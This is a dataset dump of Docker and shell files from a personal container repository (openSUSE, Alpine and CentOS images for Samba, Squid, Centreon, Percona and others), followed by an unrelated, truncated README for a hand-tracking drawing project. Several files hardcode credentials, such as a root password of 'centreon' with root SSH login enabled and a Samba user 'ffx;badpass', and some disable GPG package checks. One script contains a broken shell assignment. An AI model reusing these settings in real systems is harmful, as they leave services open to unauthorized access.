"blob_id": "ee304b94119dd9d3c4228e3f60541266392f9bb0",
"content_id": "d7e0239152c6683815865f22ded92ec74439a6cf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1503,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 63,
"path": "/centos-centreon/docker-run-server.sh",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\n\nhelp () {\n echo \"Usage: $0 hostname type link\"\n echo \"type = mysql apache squid samba torrent gitlab gcc\"\n}\n\nif [ $# -lt 2 ] ; then\n help && exit 1\nfi\n\n\nHOSTNAME=$1\nTYPE=$2\ncase $TYPE in\n mysql) CONTAINER=\"suse-mysql\" ; PORTS=\"3306\" ;;\n apache)CONTAINER=\"suse-apache\" ; PORTS=\"80 443\" ;;\n squid) CONTAINER=\"suse-squid\" ; PORTS=\"3128\" ;;\n samba) CONTAINER=\"suse-samba\" ; PORTS=\"\" ;;\n torrent) CONTAINER=\"suse-torrent\";;\n gitlab) CONTAINER=\"suse-gitlab\";;\n gcc) CONTAINER=\"suse-gcc\";;\n centreon) CONTAINER=\"centos-centreon\" PORTS=\"80 443\" ;;\n *) help && exit 1 ;;\nesac\n\nVIP=`getent hosts $HOSTNAME | awk '{print $1}'`\nENV_DIRECTORY=\"/data/docker/$TYPE/$HOSTNAME\"\nCONTAINER_DIR=\"usr/share/centreon etc/centreon etc/centreon-broker\"\nLINKED_CONTAINER=$3\n\n# Create data dir\nif [ ! -d $ENV_DIRECTORY ] ; then\n mkdir -p $ENV_DIRECTORY\nfi\n\n# Check if host adress is fount\nif [ -z $VIP ] ; then\n\techo \"Please add a entry for $HOSTNAME in /etc/hosts\"\n\texit 1\nfi\n\n#\nif [ ! -z $LINKED_CONTAINER ] ; then\n\tEXTRA_OPTS=\"$EXTRA_OPTS --link $LINKED_CONTAINER\"\nfi\n\n\nfor i in $CONTAINER_DIR ; do\n\t# Check if persistent data exist\n mkdir -p $ENV_DIRECTORY/$i\n\tif [ \"$(ls -A $ENV_DIRECTORY/$i 2> /dev/null)\" != \"\" ]; then\n\t\tDOCKER_VOLUMES=\"$DOCKER_VOLUMES -v $ENV_DIRECTORY/$i:/$i\"\n\tfi\ndone\n\n\ndocker run -d --name $HOSTNAME \\\n-h $HOSTNAME \\\n-p $VIP:80:80 -p $VIP:443:443 \\\n$DOCKER_VOLUMES \\\n$EXTRA_OPTS \\\n$CONTAINER\n"
},
{
"alpha_fraction": 0.7082067131996155,
"alphanum_fraction": 0.7416413426399231,
"avg_line_length": 26.41666603088379,
"blob_id": "05081f311a57015089f808c98a1e449e33764cc2",
"content_id": "22e5185217c72ae74d76b5d20e8faa08739a78f4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 329,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 12,
"path": "/suse-git/Dockerfile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "FROM opensuse:42.2\n\nMAINTAINER Horus \"[email protected]\"\nENV http_proxy=http://proxy:8080/\nENV https_proxy=http://proxy:8080/\n\n# make sure the repositories are up to date\nRUN zypper --non-interactive --gpg-auto-import-keys ref -s\nRUN zypper --non-interactive --gpg-auto-import-keys in git vim\nRUN zypper clean -a\n\nENTRYPOINT [\"/bin/bash\"]\n"
},
{
"alpha_fraction": 0.6264880895614624,
"alphanum_fraction": 0.6517857313156128,
"avg_line_length": 25.613861083984375,
"blob_id": "56ef759f92e88a82be333097b5c2eea6cdcb0e0b",
"content_id": "84f3f164277e0dc1dde6c9dbba930387c1d97c08",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 2688,
"license_type": "no_license",
"max_line_length": 214,
"num_lines": 101,
"path": "/suse-torrent/.bash_profile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "export PS1=\"\\[$(tput bold)\\]\\[$(tput setaf 0)\\]\\t \\[$(tput setaf 0)\\][\\[$(tput setaf 1)\\]\\u\\[$(tput setaf 1)\\]@\\[$(tput setaf 1)\\]\\h \\[$(tput setaf 1)\\]\\W\\[$(tput setaf 0)\\]]\\[$(tput setaf 0)\\]\\\\$ \\[$(tput sgr0)\\]\"\nexport http_proxy=\"http://10.211.55.21:3128\"\nexport https_proxy=\"http://10.211.55.21:3128\"\n\n\n#### Alias Sesction ####\nalias proxy=\"export http_proxy=http://10.211.55.21:3128\"\nalias ll='ls -l'\nalias la='ls -ltra'\n\nalias h='history'\nalias j='jobs -l'\n\n## Editor ###\nalias vi=vim\nalias vis='vim \"+set si\"'\nalias edit='vim'\n\n\nalias fastping='ping -c 100 -s.2'\n \n# get web server headers #\nalias header='curl -I'\n \n# find out if remote server supports gzip / mod_deflate or not #\nalias headerc='curl -I --compress'\n\n\n\nalias tcpdump='tcpdump -i'\n\ncase `uname -s` in\n\tLinux)\n\n\t# display all rules #\n\t## Colorize the grep command output for ease of use (good for log files)##\n\talias grep='grep --color=auto'\n\talias egrep='egrep --color=auto'\n\talias fgrep='fgrep --color=auto'\n\talias iptlist='sudo /sbin/iptables -L -n -v --line-numbers'\n\talias iptlistin='sudo /sbin/iptables -L INPUT -n -v --line-numbers'\n\talias iptlistout='sudo /sbin/iptables -L OUTPUT -n -v --line-numbers'\n\talias iptlistfw='sudo /sbin/iptables -L FORWARD -n -v --line-numbers'\n\talias firewall=iptlist\n\talias ports='netstat -tulanp'\n\talias ipt='sudo /sbin/iptables'\n\talias mkdir='mkdir -pv'\n\t\n\t#Service management\n\talias reload='systemctl reload'\n\talias restart='systemctl restart'\n\talias restart='systemctl restart'\n\talias start='systemctl start'\n\talias stop='systemctl stop'\n\n\talias mnt='mount |column -t'\n\talias zr='zypper ref -s'\n\talias zi='zypper in'\n\talias zs='zypper se'\n\t## pass options to free ## \n\talias meminfo='free -m -l -t'\n\t \n\t## get top process eating memory\n\talias psmem='ps auxf | sort -nr -k 4 | head -20'\n\n\t## get top process eating cpu ##\n\talias pscpu='ps auxf | sort -nr -k 3 | head -20'\n\talias ping='ping -c 5'\n\t# Docker\n\talias cddocker='cd /opt/ffx/docker/dockerfile'\n\talias dp='docker ps -a'\n\talias drunall='for i in `docker ps -q -a` ; do docker start $i ; done'\n\talias ds='docker stop'\n\talias dif=\"docker inspect --format '{{ .NetworkSettings.IPAddress }}'\"\n\talias dri='docker rmi'\n\talias di='docker images'\n\talias dr='docker rm'\n\talias dkd=\"docker run -d -P\"\n\talias dki=\"docker run -t -i -P\"\n\tdb() { docker build -t=\"$1\" .; }\n\tdra() { docker rm $(docker ps -q -a); }\n\n\tdsh() { \n\tdocker exec -i -t $1 /bin/bash\n\t}\n\n\tdbash () { \n\tdocker run --rm -i -t -e TERM=xterm --entrypoint /bin/bash $1 \n\t}\n\t;;\n\tSunOS*) \n\talias ifconfig=\"ifconfig -a | egrep -v 'IPv6|inet6'\"\n\talias pgrep='ps -ef | grep -i'\n\talias tailf='tail -f'\n\talias mkdir='mkdir -p'\n\t\n\talive () {\n\tping -s $1 2 4\n\t}\n\t;;\nesac\n"
},
{
"alpha_fraction": 0.5944882035255432,
"alphanum_fraction": 0.6062992215156555,
"avg_line_length": 13.941176414489746,
"blob_id": "3936c62763b4b0d987d8b624ae7ba1b61c608ef6",
"content_id": "656621d9682ed0febe6c487dae076daac5a36be1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 508,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 34,
"path": "/suse-squid/entrypoint.sh",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nset -e\n\ncreate_log_dir() {\n mkdir -p ${SQUID_LOG_DIR}\n chmod -R 755 ${SQUID_LOG_DIR}\n chown -R ${SQUID_USER} ${SQUID_LOG_DIR}\n}\n\ncreate_cache_dir() {\n mkdir -p ${SQUID_CACHE_DIR}\n chown -R ${SQUID_USER} ${SQUID_CACHE_DIR}\n}\n\nstart_squid () {\n\tsquid -NYC\n}\n\ncreate_cache_dir () {\n\tsquid -z -F\n}\n\ncreate_log_dir\ncreate_cache_dir\n\nif [[ -z ${1} ]]; then\n\tif [[ ! -d ${SQUID_CACHE_DIR}/00 ]]; then\n\t\techo \"Initializing cache...\"\n\t\tcreate_cache_dir\n\tfi\n\techo \"Starting squid...\"\n\tstart_squid\nfi\n"
},
{
"alpha_fraction": 0.6404358148574829,
"alphanum_fraction": 0.6646488904953003,
"avg_line_length": 24.030303955078125,
"blob_id": "0ff67b852f2ef2ed3d69a5a76919835fa98adddb",
"content_id": "d768aaae1662479f496c5dda221389333c5ea22d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 826,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 33,
"path": "/suse-samba/docker-run.sh",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "VIP=\"suse-samba\"\nENV_DIRECTORY=\"/data/docker/samba/$VIP\"\nSAMBA_DIR=\"box downloads\"\nIP_VHOST=`getent hosts $VIP | awk '{print $1}'`\n\nLIB_DIR=\"/opt/ffx/scripts/libs\"\n. $LIB_DIR/systemd\n\nif [ ! -d $ENV_DIRECTORY ] ; then\n\tmkdir -p $ENV_DIRECTORY/shares\n\tmkdir -p $ENV_DIRECTORY/etc/\nfi\n\nif [ \"$(ls -A $ENV_DIRECTORY/etc 2> /dev/null)\" != \"\" ]; then\n\tDOCKER_VOLUMES=\" -v $ENV_DIRECTORY/etc/:/etc/samba/\"\nfi\n\nfor i in $SAMBA_DIR ; do \n\tmkdir -p $ENV_DIRECTORY/shares/$i\n\tDOCKER_VOLUMES=\"$DOCKER_VOLUMES -v $ENV_DIRECTORY/shares/$i:/shares/$i\"\ndone\n\ndocker run -it -h $VIP \\\n--name $VIP \\\n-p $IP_VHOST:137:137 $IP_VHOST:139:139 -p $IP_VHOST:445:445 \\\n$DOCKER_VOLUMES \\\n-d suse-samba \\\n-u \"ffx;badpass\" \\\n-s \"IN_BOX;/shares/box;yes;no;yes;;ffx\" \\\n-s \"DOWNLOADS;/shares/downloads;yes;no;no;ffx\" \\\n-n\n\nconfigure_docker_auto_start $VIP\n"
},
{
"alpha_fraction": 0.6666666865348816,
"alphanum_fraction": 0.6834381818771362,
"avg_line_length": 24.105262756347656,
"blob_id": "3c079f14da297eed5de390cfc0cc4dc502bf1ae2",
"content_id": "cac5338aed952da1627ebbc80c5b2a03bc508d1e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 477,
"license_type": "no_license",
"max_line_length": 181,
"num_lines": 19,
"path": "/suse-nginx/docker-run-nginx.sh",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\ndocker_port=\"86\"\ndocker_remote_port=\"80\"\ndocker_type=\"app_http\"\ndocker_conf_dir=\"\"\ndocker_data_dir=\"\"\ndocker_log_dir=\"\"\ndocker_cert_dir=\"\"\n\nEXTRA_OPTS=\"\"\n#CMD=\"docker run $EXTRA_OPTS\"\n\nif [ ! -z $docker_port ]; then\n\t$EXTRA_OPTS=\"$EXTRA_OPTS -p $docker_port\"\nfi\necho \"$EXTRA_OPTS\"\n\n#docker run -d -p 80:80 -v $docker_conf_dir:/etc/nginx/conf.d -v $docker_cert_dir:/etc/nginx/certs -v $docker_log_dir:/var/log/nginx -v $docker_data_dir:/var/www/html opensuse/nginx\n"
},
{
"alpha_fraction": 0.6539509296417236,
"alphanum_fraction": 0.6784741282463074,
"avg_line_length": 29.58333396911621,
"blob_id": "88f31d093e706c17cc175b10e333a3fd134aecc7",
"content_id": "1b46f0fbf471c7abf20829179f7756b67abc8b1c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1468,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 48,
"path": "/alpine-samba/docker-run.sh",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "DIRECTORY=\"$HOME\"\nSHARES=\"Downloads Git Documents\"\nIP_VHOST=\"10.11.66.1 10.11.12.1\"\nDOCKER_CMD=\"podman\"\nDOCKER_ARGS=\"--cpus=1 -m 1g\"\nDOCKER_IMG_NAME=\"alpine-samba\"\nDOCKER_CNT_NAME=\"--name alpine-samba\"\nDOCKER_CMD_ARGS=\"-n -u ffx;badpass\"\n\n# Allow users to bind on low ports\nsudo sysctl -w net.ipv4.ip_unprivileged_port_start=0 &>/dev/null\n\n# Allow samba port on firewalld\nsudo firewall-cmd --add-service=samba --permanent\n\n# Allow users to limit cpu in systemd configuration (rootless)\nif [ ! -f \"/etc/systemd/system/user\\@.service.d/delegate.conf\" ] ; then\n sudo mkdir /etc/systemd/system/user\\@.service.d &>/dev/null\n cat << EOF | sudo tee /etc/systemd/system/user\\@.service.d/delegate.conf &>/dev/null\n[Service]\nDelegate=memory pids cpu io\nEOF\nsudo systemctl daemon-reload\nfi\n\n# Bind port on multiple interface\nfor IP in ${IP_VHOST} ; do\n DOCKER_PORTS_BIND=\"${DOCKER_PORTS_BIND} -p ${IP}:137:137 -p ${IP}:139:139 -p ${IP}:445:445\"\ndone\n\n# Create local shares if not present\nfor SHARE in ${SHARES} ; do\n if [ ! -d \"${DIRECTORY}/${SHARE}\" ] ; then\n\tmkdir -p ${DIRECTORY}/${SHARE}\n fi\n DOCKER_VOLUMES=\"${DOCKER_VOLUMES} -v ${DIRECTORY}/${SHARE}:/shares/${SHARE}\"\n DOCKER_CMD_ARGS=\"${DOCKER_CMD_ARGS} -s ${SHARE};/shares/${SHARE};yes;no;yes;;ffx\"\ndone\n\nCMD=\"${DOCKER_CMD} run --rm -it -d --hostname ${DOCKER_IMG_NAME} \\\n${DOCKER_ARGS} \\\n${DOCKER_CNT_NAME} \\\n${DOCKER_PORTS_BIND} \\\n${DOCKER_VOLUMES} \\\n${DOCKER_IMG_NAME} \\\n${DOCKER_CMD_ARGS}\"\n\n$CMD\n"
},
{
"alpha_fraction": 0.6212465763092041,
"alphanum_fraction": 0.6674249172210693,
"avg_line_length": 33.34375,
"blob_id": "9df7143759a605bd62877f6d3fe3a79472b7f097",
"content_id": "4f48fc34b43a5a4578d3a0ba846a7986a3985776",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 4396,
"license_type": "no_license",
"max_line_length": 136,
"num_lines": 128,
"path": "/suse-percona/Dockerfile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "FROM opensuse:42.2\n\nEXPOSE 80 443 3000\n\nWORKDIR /opt\n\n#ADD smt.crt /etc/pki/trust/anchors/smt.crt\n#RUN update-ca-certificates\n\n#RUN zypper --gpg-auto-import-keys ref -s\nENV http_proxy=http://proxy:8080/\nENV https_proxy=http://proxy:8080/\n\n\nRUN zypper install -y curl git-core unzip python-requests python-pysqlite tar fontconfig cron vi\n\n\nRUN zypper addrepo --no-gpgcheck http://download.opensuse.org/repositories/devel:languages:python/SLE_12_SP1/devel:languages:python.repo\nRUN zypper refresh\nRUN zypper install -y supervisor\nRUN zypper install -y python\n\n#ADD nginx-1.10.2-1.sles12.ngx.x86_64.rpm /root/nginx.rpm\n#RUN zypper --no-gpg-checks --non-interactive install /root/nginx.rpm\n\n#ADD mysql57-community-release-sles12-8.noarch.rpm /root/mysql.rpm\n#RUN zypper --no-gpg-checks --non-interactive install /root/mysql.rpm\nRUN zypper --no-gpg-checks --non-interactive install mysql-server\nRUN zypper --no-gpg-checks --non-interactive install nginx\n#RUN zypper --no-gpg-checks --non-interactive install mysql-community-server\n\nRUN useradd -s /bin/false -U pmm\nRUN useradd -U www-data\nRUN mkdir /var/log/supervisor\n\n# ########## #\n# Prometheus #\n# ########## #\nRUN curl -s -LO https://github.com/prometheus/prometheus/releases/download/v1.2.2/prometheus-1.2.2.linux-amd64.tar.gz && \\\n mkdir -p prometheus/data node_exporter && \\\n chown -R pmm:pmm /opt/prometheus/data && \\\n tar zxf prometheus-1.2.2.linux-amd64.tar.gz --strip-components=1 -C prometheus && \\\n curl -s -LO https://github.com/prometheus/node_exporter/releases/download/0.12.0/node_exporter-0.12.0.linux-amd64.tar.gz && \\\n tar zxf node_exporter-0.12.0.linux-amd64.tar.gz --strip-components=1 -C node_exporter && \\\n rm -f prometheus-1.2.2.linux-amd64.tar.gz node_exporter-0.12.0.linux-amd64.tar.gz\nCOPY prometheus.yml /opt/prometheus/\n\n# ###################### #\n# Grafana and dashboards #\n# ###################### #\nCOPY import-dashboards.py grafana-postinstall.sh VERSION /opt/\nADD grafana-3.1.1-1470047149.x86_64.rpm /root/grafana.rpm\nRUN rpm -i --nodeps /root/grafana.rpm\n\nRUN git clone https://github.com/percona/grafana-dashboards.git \n\nRUN cp /opt/VERSION /var/lib/grafana/ && \\\n rm -rf /root/grafana.rpm grafana-dashboards/.git\n\nRUN /opt/grafana-postinstall.sh\n\n# ###### #\n# Consul #\n# ###### #\nRUN curl -s -LO https://releases.hashicorp.com/consul/0.7.0/consul_0.7.0_linux_amd64.zip && \\\n unzip consul_0.7.0_linux_amd64.zip && \\\n mkdir -p /opt/consul-data && \\\n chown -R pmm:pmm /opt/consul-data && \\\n rm -f consul_0.7.0_linux_amd64.zip\n\n# ##### #\n# Nginx #\n# ##### #\nCOPY nginx.conf nginx-ssl.conf /etc/nginx/\nRUN touch /etc/nginx/.htpasswd\n\n# ############ #\n# Orchestrator #\n# ############ #\nCOPY orchestrator.conf.json /etc/\n\nADD orchestrator-1.5.6-1.x86_64.rpm /root/orchestrator.rpm\nRUN zypper --no-gpg-checks --non-interactive install /root/orchestrator.rpm\n\n\nRUN curl -s -LO https://www.percona.com/downloads/TESTING/pmm/orchestrator-1.5.6-patch.tgz && \\\n tar zxf orchestrator-1.5.6-patch.tgz -C /usr/local/orchestrator/ && \\\n rm -f orchestrator-1.5.6-patch.tgz\n\nRUN rm -f /root/orchestrator.rpm\n\n# ########################### #\n# Supervisor and landing page #\n# ########################### #\nCOPY supervisord.conf /etc/supervisor/supervisord.conf\nCOPY entrypoint.sh /opt\nCOPY landing-page/ /opt/landing-page/\n\n# ####################### #\n# Percona Query Analytics #\n# ####################### #\nCOPY purge-qan-data /etc/cron.daily/\nCOPY qan-install.sh /opt/\nADD https://www.percona.com/downloads/TESTING/pmm/percona-qan-api-1.0.6-20161024.2cbdd01-x86_64.tar.gz \\\n https://www.percona.com/downloads/TESTING/pmm/percona-qan-app-1.0.6.tar.gz \\\n /opt/\n\nRUN curl -s -L -o /usr/bin/pt-archiver https://raw.githubusercontent.com/percona/percona-toolkit/2.2/bin/pt-archiver && \\\n chmod 755 /usr/bin/pt-archiver && \\\n mkdir qan-api qan-app && \\\n tar zxf percona-qan-api-1.0.6-20161024.2cbdd01-x86_64.tar.gz --strip-components=1 -C qan-api && \\\n tar zxf percona-qan-app-1.0.6.tar.gz --strip-components=1 -C qan-app \n\nRUN /opt/qan-install.sh\nRUN rm -rf percona-qan-api-1.0.6-20161024.2cbdd01-x86_64.tar.gz percona-qan-app-1.0.6.tar.gz qan-api\n\n# ####### #\n# Volumes #\n# ####### #\n\nVOLUME /opt/prometheus/data\nVOLUME /opt/consul-data\nVOLUME /var/lib/mysql\n\n# ##### #\n# Start #\n# ##### #\nCMD [\"/opt/entrypoint.sh\"]\n"
},
{
"alpha_fraction": 0.6645161509513855,
"alphanum_fraction": 0.7370967864990234,
"avg_line_length": 30,
"blob_id": "67a3103ee609118deac319ea6079e6eaf94de76a",
"content_id": "4e1d44d9bfba057782689de3b121c8fc04e36773",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 620,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 20,
"path": "/suse-webmin/Dockerfile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "FROM opensuse:42.2\n\nMAINTAINER Horus \"[email protected]\"\nENV http_proxy=http://proxy:8080/\nENV https_proxy=http://proxy:8080/\nENV APACHE_VERSION=2.4.10 \\\n TERM=xterm\n\n# make sure the repositories are up to date\nRUN zypper -n install wget apache2 openssl openssl-devel perl perl-Net-SSLeay perl-Crypt-SSLeay\n\nRUN cd /tmp/ && wget -q https://sourceforge.net/projects/webadmin/files/webmin/1.810/webmin-1.810-1.noarch.rpm\nRUN cd /tmp/ && rpm -ivh webmin-1.810-1.noarch.rpm\nRUN rm -rf /tmp/webmin-1.810-1.noarch.rpm && rm -rf /tmp/webmin*\nRUN zypper clean -a\n\nEXPOSE 80/tcp\nEXPOSE 443/tcp\nEXPOSE 10000/tcp\nENTRYPOINT [\"/bin/bash\"]\n"
},
{
"alpha_fraction": 0.6419098377227783,
"alphanum_fraction": 0.6472148299217224,
"avg_line_length": 24.133333206176758,
"blob_id": "276235add5bd02dec43f49a60e781f4f1f3a8de2",
"content_id": "1614c3bb90b58aa4a10180efa266b915f4edcf98",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 377,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 15,
"path": "/alpine-rtorrent/docker-run.sh",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "#!/bin/bash -x\n\nNAME=\"rtorrent\"\n\n####\n#PORTS_CFG=\"--publish-all\"\nCPU_CFG=\"--cpus=1\"\nMEM_CFG=\"--memory=1g\"\nVOL_CFG=\"-v /home/reizer/Downloads:/var/data/\"\n\n### Podman ###\n#sudo docker run -d -it -h $NAME --name $NAME $VOL_OPTS $PORTS_OPTS localhost/alpine-torrent\n\n### Docker ###\nsudo docker run -d -it -h $NAME --name $NAME $CPU_CFG $MEM_CFG $VOL_CFG $PORTS_CFG alpine-rtorrent\n"
},
{
"alpha_fraction": 0.7490794062614441,
"alphanum_fraction": 0.762230396270752,
"avg_line_length": 32.94643020629883,
"blob_id": "d93a99c854750b82f8215b8fb64fbb7bb576ac23",
"content_id": "7fb1dab6a2585dc2b62ecbd16d3581ee78b19dfe",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 1901,
"license_type": "no_license",
"max_line_length": 195,
"num_lines": 56,
"path": "/centos-centreon/Dockerfile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "FROM centos:6\nMAINTAINER ffx <[email protected]>\n\n\nENV http_proxy=http://proxy:8080/\nENV https_proxy=http://proxy:8080/\n\nENV CENTREON_CONF=\"/etc/centreon/\"\nENV CENTREON_WWW=\"/usr/share/centreon/www/\"\nENV TERM=xterm\n\n\n# Install Centreon Repository\n\nRUN yum -y install wget\nRUN wget http://yum-1.centreon.com/standard/3.4/el6/stable/RPM-GPG-KEY-CES -O /etc/pki/rpm-gpg/RPM-GPG-KEY-CES\nRUN wget http://yum.centreon.com/standard/3.4/el6/stable/centreon-stable.repo -O /etc/yum.repos.d/centreon-stable.repo\n\nRUN yum -y update\nRUN yum -y install centreon-base-config-centreon-engine centreon\n\n\n# Install ssh\nRUN yum -y install openssh-server openssh-client\nRUN mkdir /var/run/sshd\nRUN echo 'root:centreon' | chpasswd\nRUN sed -i 's/^#PermitRootLogin/PermitRootLogin/g' /etc/ssh/sshd_config\nRUN /etc/init.d/sshd start && /etc/init.d/sshd stop\n\nRUN yum -y install centreon-widget-graph-monitoring centreon-widget-host-monitoring centreon-widget-service-monitoring centreon-widget-hostgroup-monitoring centreon-widget-servicegroup-monitoring\n# Fix pass in db\nRUN sed -i 's/^;date.timezone =.*$/date.timezone = Europe\\/Paris/g' /etc/php.ini\nRUN echo \"SELINUX=disabled\" > /etc/sysconfig/selinux\n\n# Set rights for setuid\nRUN chown root:centreon-engine /usr/lib/nagios/plugins/check_icmp\nRUN chmod -w /usr/lib/nagios/plugins/check_icmp\nRUN chmod u+s /usr/lib/nagios/plugins/check_icmp\n\n# Install and configure supervisor\nRUN yum -y install python-setuptools nrpe-plugin\nRUN easy_install supervisor\n\n# Todo better split file\nADD supervisord.conf /etc/supervisord.conf\nADD run.sh /etc/centreon/\nRUN ln -s /usr/lib64/nagios/plugins/check_nrpe /usr/lib/nagios/plugins/check_nrpe\nRUN chmod +x /etc/centreon/run.sh\nRUN rm -rf /var/tmp/* /tmp/*\n\n# Expose port SSH and HTTP for the service\nEXPOSE 22 80 443\nVOLUME [\"${CENTREON_CONF}\"]\nVOLUME [\"${CENTREON_WWW}\"]\n\nCMD [\"/usr/bin/supervisord\",\"--configuration=/etc/supervisord.conf\"]\n"
},
{
"alpha_fraction": 0.5569210648536682,
"alphanum_fraction": 0.5847347974777222,
"avg_line_length": 23.539682388305664,
"blob_id": "35d8ec65ac34ac1a44fe374d3490dbc5872d5970",
"content_id": "799178748bd6de85d45f28d23766f94b0d2b188d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1546,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 63,
"path": "/suse-splunk/docker-run.sh",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n\nhelp () {\n echo \"Usage: $0 hostname type(optional)\"\n echo \"type = mysql apache splunk splunk-light splunk-fw squid samba torrent gitlab gcc\"\n}\n\nif [ $# -lt 1 ] ; then\n help && exit 1\nfi\n\n\nHOSTNAME=$1\nTYPE=$2\nLINKED_CONTAINER=$3\n\ncase $TYPE in\n mysql) IMAGE=\"suse-mysql\" ; PORTS=\"3306\" ;;\n apache)IMAGE=\"suse-apache\" ; PORTS=\"80 443\";;\n squid) IMAGE=\"suse-squid\" ; PORTS=\"3128\" ;;\n samba) IMAGE=\"suse-samba\" ; PORTS=\"\" ;;\n torrent) IMAGE=\"suse-torrent\";;\n gitlab) IMAGE=\"suse-gitlab\";;\n gcc) IMAGE=\"suse-gcc\";;\n splunk) IMAGE=\"suse-splunk\"; PORTS=\"8000 443 9997\";;\n splunk-light) IMAGE=\"suse-splunk-light\"; PORTS=\"8000 443\";;\n splunk-fw) IMAGE=\"suse-splunk-fw\"; PORTS=\"8089\";;\n *) help && exit 1 ;;\nesac\n\nVIP=`getent hosts $HOSTNAME | awk '{print $1}'`\nENV_DIRECTORY=\"/data/docker/$TYPE/$HOSTNAME\"\nDATA_VOLUMES=\"\"\n\nif [ ! -z \"$LINKED_CONTAINER\" ] ; then\n EXTRA_OPTS=\"$EXTRA_OPTS --link $LINKED_CONTAINER \"\nfi\n\nif [ ! -z \"$PORTS\" ] ; then\n\tfor PORT in $PORTS ; do\n \tEXTRA_OPTS=\"$EXTRA_OPTS -p $VIP:$PORT:$PORT \"\n\tdone\nfi\n\nif [ ! -z \"$DATA_VOLUMES\" ] ; then\n\tfor i in $DATA_VOLUMES ; do\n\t\tif [ ! -d $ENV_DIRECTORY/$i ] ; then\n\t\t\tmkdir -p $ENV_DIRECTORY/$i\n\t\tfi\n\n\t\tif [ \"$(ls -A $ENV_DIRECTORY/$i)\" != \"\" ] ; then\n\t\t\tVOLUMES=\"$VOLUMES -v $ENV_DIRECTORY/$i:/$i \"\n\t\tfi\n\tdone\nfi\n\ndocker run -d --name $HOSTNAME \\\n-h $HOSTNAME \\\n$VOLUMES \\\n$EXTRA_OPTS \\\n-e SPLUNK_START_ARGS=\"--accept-license --answer-yes --no-prompt\" \\\n$IMAGE\n"
}
] | 51 |
Juan-glitch/air-drawing
|
https://github.com/Juan-glitch/air-drawing
|
bddd9e1d0738334fed4eb2dd83ffe8d01a8f3ed3
|
55e818b595d71b459dba69e43b792cedc7a8b5e8
|
13b70cb120d8816c541a6ed8815313195d381a73
|
refs/heads/main
| 2023-07-31T11:29:02.240528 | 2021-09-12T20:31:09 | 2021-09-12T20:31:09 | 407,596,771 | 1 | 0 |
MIT
| 2021-09-17T15:46:40 | 2021-09-17T15:46:39 | 2021-09-12T20:31:09 | null |
[
{
"alpha_fraction": 0.7815168499946594,
"alphanum_fraction": 0.7830235958099365,
"avg_line_length": 98.55000305175781,
"blob_id": "f2478707b2c2d378db0c86e4e4d7c3392fac14d8",
"content_id": "97a121782e8a90639805f5fc052bdb10b7f6e031",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1994,
"license_type": "permissive",
"max_line_length": 848,
"num_lines": 20,
"path": "/README.md",
"repo_name": "Juan-glitch/air-drawing",
"src_encoding": "UTF-8",
"text": "# air-drawing 👆\n\nThis tool uses Deep Learning to help you draw and write with your hand and webcam. A Deep Learning model is used to try to predict whether you want to have 'pencil up' or 'pencil down'.\n\n**Try it online : [loicmagne.github.io/air-drawing](https://loicmagne.github.io/air-drawing/)**\n\n\n\n## Technical Details\n\n- This pipeline is made up of two steps: detecting the hand, and predicting the drawing. Both steps are done using Deep Learning.\n- The handpose detection is performed using [MediaPipe toolbox](https://google.github.io/mediapipe/solutions/hands.html)\n- The drawing prediction part uses only the finger position, not the image. The input is a sequence of 2D points (actually i'm using the speed and acceleration of the finger instead of the position to make the prediction translation-invariant), and the output is a binary classification 'pencil up' or 'pencil down'. I used a simple bidirectionnal LSTM architecture. I made a small dataset myself (~50 samples) which I annotated thanks to tools provided in the `python-stuff/data-wrangling/`. At first I wanted to make the 'pencil up'/'pencil down' prediction in real-time, i.e. make the predictions at the same time the user draws. However this task was too difficult and I had poor results, which is why I'm now using bidirectionnal LSTM. You can find details of the deep learning pipeline in the jupyter-notebook in `python-stuff/deep-learning/`\n- The application is entirely client-side. I deployed the deep learning model by converting the PyTorch model to .onnx, and then using the [ONNX Runtime](https://github.com/microsoft/onnxruntime) which is very convenient and compatible with a lot of layers.\n\n## Going Forward\n\nOverall the pipeline still struggles and needs some improvement. 